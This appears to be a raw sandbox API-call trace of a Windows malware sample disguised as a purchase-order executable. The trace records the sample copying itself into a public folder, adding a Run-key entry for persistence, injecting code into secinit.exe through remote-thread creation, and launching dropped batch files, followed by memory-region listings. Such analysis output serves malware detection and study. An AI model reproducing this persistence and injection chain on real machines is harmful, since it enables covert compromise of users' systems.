(lpszFormat="TaskbarCreated") returned 0xc0d6 [0106.435] SysReAllocStringLen (in: pbstr=0x3908714*=0x0, psz="USERPROFILE", len=0xb | out: pbstr=0x3908714*="USERPROFILE") returned 1 [0106.435] SysReAllocStringLen (in: pbstr=0x3908710*=0x0, psz="*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@", len=0x24 | out: pbstr=0x3908710*="*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@") returned 1 [0106.435] FindResourceA (hModule=0x38b0000, lpName="YAK", lpType=0xa) returned 0x3916590 [0106.435] SizeofResource (hModule=0x38b0000, hResInfo=0x3916590) returned 0x2934f [0106.435] LoadResource (hModule=0x38b0000, hResInfo=0x3916590) returned 0x3919058 [0106.435] LockResource (hResData=0x3919058) returned 0x3919058 [0106.443] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@", cchWideChar=36, lpMultiByteStr=0x29cec20, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@\x02ÿÿÿJ", lpUsedDefaultChar=0x0) returned 36 [0106.443] VirtualAlloc (lpAddress=0x0, dwSize=0xb0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fe00000 [0106.468] GetFileAttributesA (lpFileName="C:\\Users\\Public\\Libraries" (normalized: "c:\\users\\public\\libraries")) returned 0x13 [0106.469] GetFileAttributesA (lpFileName="C:\\Users\\Public\\Libraries\\Udffvxu" (normalized: "c:\\users\\public\\libraries\\udffvxu")) returned 0xffffffff [0106.469] CreateDirectoryA (lpPathName="C:\\Users\\Public\\Libraries\\Udffvxu" (normalized: "c:\\users\\public\\libraries\\udffvxu"), lpSecurityAttributes=0x0) returned 1 [0106.483] GetFileAttributesA (lpFileName="C:\\Users\\Public\\Libraries\\uxvffdU.url" (normalized: "c:\\users\\public\\libraries\\uxvffdu.url")) returned 0xffffffff [0106.484] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x29cfb1c, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\po-003785gmhn.exe")) returned 0x2f [0106.484] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PO-003785GMHN.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\po-003785gmhn.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0106.484] GetFileSize (in: hFile=0x4ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf6600 [0106.484] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fd00000 [0106.488] ReadFile (in: hFile=0x4ec, lpBuffer=0x7fd00018, nNumberOfBytesToRead=0xf6600, lpNumberOfBytesRead=0x29cfc08, lpOverlapped=0x0 | out: lpBuffer=0x7fd00018*, lpNumberOfBytesRead=0x29cfc08*=0xf6600, lpOverlapped=0x0) returned 1 [0106.502] CloseHandle (hObject=0x4ec) returned 1 [0106.502] _lcreat (lpPathName="C:\\Users\\Public\\Libraries\\Udffvxu\\Udffvxu.exe" (normalized: "c:\\users\\public\\libraries\\udffvxu\\udffvxu.exe"), iAttribute=0) returned 0x4ec [0106.503] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fc00000 [0106.516] _hwrite (in: hFile=0x4ec, lpBuffer=0x7fc00018*, lBytes=1009152 | out: lpBuffer=0x7fc00018*) returned 1009152 [0106.534] _lclose (hFile=0x4ec) returned 0x0 [0107.989] VirtualFree (lpAddress=0x7fc00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0107.994] CreateFileA (lpFileName="C:\\Users\\Public\\Libraries\\uxvffdU.url" (normalized: "c:\\users\\public\\libraries\\uxvffdu.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0107.994] WriteFile (in: hFile=0x4ec, lpBuffer=0x39863c8*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x29cfbc4, lpOverlapped=0x0 | out: lpBuffer=0x39863c8*, lpNumberOfBytesWritten=0x29cfbc4*=0x60, lpOverlapped=0x0) returned 1 [0107.995] CloseHandle (hObject=0x4ec) returned 1 [0107.996] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x29cfc1c | out: phkResult=0x29cfc1c*=0x4ec) returned 0x0 [0107.996] RegSetValueExA (in: hKey=0x4ec, lpValueName="Udffvxu", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\Public\\Libraries\\uxvffdU.url", cbData=0x25 | out: lpData="C:\\Users\\Public\\Libraries\\uxvffdU.url") returned 0x0 [0107.996] RegCloseKey (hKey=0x4ec) returned 0x0 [0108.014] VirtualAlloc (lpAddress=0x0, dwSize=0x140000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a90000 [0108.028] QueryPerformanceCounter (in: lpPerformanceCount=0x29cfc28 | out: lpPerformanceCount=0x29cfc28*=3152588553071) returned 1 [0108.028] GetFileAttributesA (lpFileName="C:\\Windows\\System32\\secinit.exe" (normalized: "c:\\windows\\syswow64\\secinit.exe")) returned 0x20 [0108.036] VirtualAlloc (lpAddress=0x50480000, dwSize=0x29000, flAllocationType=0x3000, flProtect=0x40) returned 0x50480000 [0108.037] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\secinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29cfba4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29cfbe8 | out: lpCommandLine="", lpProcessInformation=0x29cfbe8*(hProcess=0x4e8, hThread=0x4ec, dwProcessId=0x738, dwThreadId=0x784)) returned 1 [0108.211] VirtualFree (lpAddress=0x50480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0108.212] VirtualAllocEx (hProcess=0x4e8, lpAddress=0x50480000, dwSize=0x29000, flAllocationType=0x3000, flProtect=0x40) returned 0x50480000 [0108.214] VirtualAlloc (lpAddress=0x50480000, dwSize=0x29000, flAllocationType=0x2000, flProtect=0x1) returned 0x50480000 [0108.214] VirtualAlloc (lpAddress=0x50480000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x50480000 [0108.215] VirtualAlloc (lpAddress=0x50481000, dwSize=0x27b7c, flAllocationType=0x1000, flProtect=0x4) returned 0x50481000 [0108.218] WriteProcessMemory (in: hProcess=0x4e8, lpBaseAddress=0x50480000, lpBuffer=0x50480000*, nSize=0x29000, lpNumberOfBytesWritten=0x29cfbfc | out: lpBuffer=0x50480000*, lpNumberOfBytesWritten=0x29cfbfc*=0x29000) returned 1 [0108.261] VirtualAllocEx (hProcess=0x4e8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x110000 [0108.261] WriteProcessMemory (in: hProcess=0x4e8, lpBaseAddress=0x110000, lpBuffer=0x29cfc00*, nSize=0x8, lpNumberOfBytesWritten=0x29cfb4c | out: lpBuffer=0x29cfc00*, lpNumberOfBytesWritten=0x29cfb4c*=0x8) returned 1 [0108.267] VirtualAllocEx (hProcess=0x4e8, lpAddress=0x0, dwSize=0x18a, flAllocationType=0x3000, flProtect=0x40) returned 0x120000 [0108.267] WriteProcessMemory (in: hProcess=0x4e8, lpBaseAddress=0x120000, lpBuffer=0x38ccdf8*, nSize=0x18a, lpNumberOfBytesWritten=0x29cfb4c | out: lpBuffer=0x38ccdf8*, lpNumberOfBytesWritten=0x29cfb4c*=0x18a) returned 1 [0108.268] CreateRemoteThread (in: hProcess=0x4e8, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x120000, lpParameter=0x110000, dwCreationFlags=0x0, lpThreadId=0x29cfb70 | out: lpThreadId=0x29cfb70*=0x708) returned 0x4f4 [0108.272] GetFileAttributesA (lpFileName="C:\\Users\\Public\\nest" (normalized: "c:\\users\\public\\nest")) returned 0xffffffff [0108.272] _lcreat (lpPathName="C:\\Users\\Public\\KDECO.bat" (normalized: "c:\\users\\public\\kdeco.bat"), iAttribute=0) returned 0x4f0 [0108.274] _hwrite (in: hFile=0x4f0, lpBuffer=0x3a56808*, lBytes=155 | out: lpBuffer=0x3a56808*) returned 155 [0108.275] _lclose (hFile=0x4f0) returned 0x0 [0108.276] _lcreat (lpPathName="C:\\Users\\Public\\UKO.bat" (normalized: "c:\\users\\public\\uko.bat"), iAttribute=0) returned 0x4f0 [0108.276] _hwrite (in: hFile=0x4f0, lpBuffer=0x39897d8*, lBytes=250 | out: lpBuffer=0x39897d8*) returned 250 [0108.277] _lclose (hFile=0x4f0) returned 0x0 [0108.278] _lcreat (lpPathName="C:\\Users\\Public\\Trast.bat" (normalized: "c:\\users\\public\\trast.bat"), iAttribute=0) returned 0x4f0 [0108.278] _hwrite (in: hFile=0x4f0, lpBuffer=0x3a88f08*, lBytes=34 | out: lpBuffer=0x3a88f08*) returned 34 [0108.279] _lclose (hFile=0x4f0) returned 0x0 [0108.279] CreateFileA (lpFileName="C:\\Users\\Public\\nest" (normalized: "c:\\users\\public\\nest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0108.280] WriteFile (in: hFile=0x4f0, lpBuffer=0x3a6c758*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x29cfbc4, lpOverlapped=0x0 | out: lpBuffer=0x3a6c758*, lpNumberOfBytesWritten=0x29cfbc4*=0x9, lpOverlapped=0x0) returned 1 [0108.280] CloseHandle (hObject=0x4f0) returned 1 [0108.281] GetFileAttributesA (lpFileName="C:\\Users\\Public\\Trast.bat" (normalized: "c:\\users\\public\\trast.bat")) returned 0x20 [0108.281] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\Public\\Trast.bat\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\Public\\", lpStartupInfo=0x29cfbe8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29cfbd8 | out: lpCommandLine="\"C:\\Users\\Public\\Trast.bat\" ", lpProcessInformation=0x29cfbd8*(hProcess=0x500, hThread=0x4f0, dwProcessId=0x814, dwThreadId=0x820)) returned 1 [0108.653] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) Thread: id = 5 os_tid = 0x2a4 Thread: id = 6 os_tid = 0x9dc Thread: id = 7 os_tid = 0x47c Thread: id = 17 os_tid = 0x12ac Process: id = "2" image_name = "secinit.exe" filename = "c:\\windows\\syswow64\\secinit.exe" page_root = "0x2a0bb000" os_pid = "0x738" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x12b8" cmd_line = "\"C:\\Windows\\System32\\secinit.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 407 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 408 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 409 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 410 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 411 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 412 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 413 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 414 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 415 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 416 start_va = 0xcb0000 end_va = 0xcb6fff monitored = 0 entry_point = 0xcb2820 region_type = mapped_file name = "secinit.exe" filename = "\\Windows\\SysWOW64\\secinit.exe" (normalized: "c:\\windows\\syswow64\\secinit.exe") Region: id = 417 start_va = 0xcc0000 end_va = 0x4cbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 418 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 419 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 420 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 421 start_va = 0x7fff0000 end_va = 0x7dfc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 422 start_va = 0x7dfc5f810000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc5f810000" filename = "" Region: id = 423 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 424 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 425 start_va = 0x50480000 end_va = 0x504a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000050480000" filename = "" Region: id = 427 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 428 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 447 start_va = 0x130000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 448 start_va = 0x170000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 449 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 450 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 451 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 452 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 453 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 460 start_va = 0x480000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 463 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 464 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 465 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 466 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 467 start_va = 0x480000 end_va = 0x53dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 468 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 469 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 470 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 471 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 472 start_va = 0x1b0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 473 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 474 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 475 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 476 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 477 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 478 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 479 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 480 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 483 start_va = 0x70020000 end_va = 0x70038fff monitored = 0 entry_point = 0x700247e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 494 start_va = 0x6cc40000 end_va = 0x6cc4ffff monitored = 0 entry_point = 0x6cc434d0 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 495 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 496 start_va = 0x73c30000 end_va = 0x73c4afff monitored = 0 entry_point = 0x73c39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 497 start_va = 0x690000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 498 start_va = 0x440000 end_va = 0x469fff monitored = 0 entry_point = 0x445680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 499 start_va = 0x690000 end_va = 0x817fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 500 start_va = 0x870000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 501 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 502 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 503 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 504 start_va = 0x440000 end_va = 0x440fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "secinit.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\secinit.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\secinit.exe.mui") Region: id = 505 start_va = 0x880000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 506 start_va = 0x4cc0000 end_va = 0x60bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cc0000" filename = "" Thread: id = 8 os_tid = 0x708 Thread: id = 9 os_tid = 0x784 Thread: id = 11 os_tid = 0x6c0 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2bdf0000" os_pid = "0x814" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x12b8" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\Public\\Trast.bat\" \"" cur_dir = "C:\\Users\\Public\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 429 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 430 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 431 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 432 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 433 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 434 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 435 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 436 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 437 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 438 start_va = 0x1050000 end_va = 0x10a1fff monitored = 1 entry_point = 0x1064fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 439 start_va = 0x10b0000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010b0000" filename = "" Region: id = 440 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 441 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 442 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 443 start_va = 0x7fff0000 end_va = 0x7dfc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 444 start_va = 0x7dfc5f810000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc5f810000" filename = "" Region: id = 445 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 446 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 454 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 455 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 456 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 457 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = 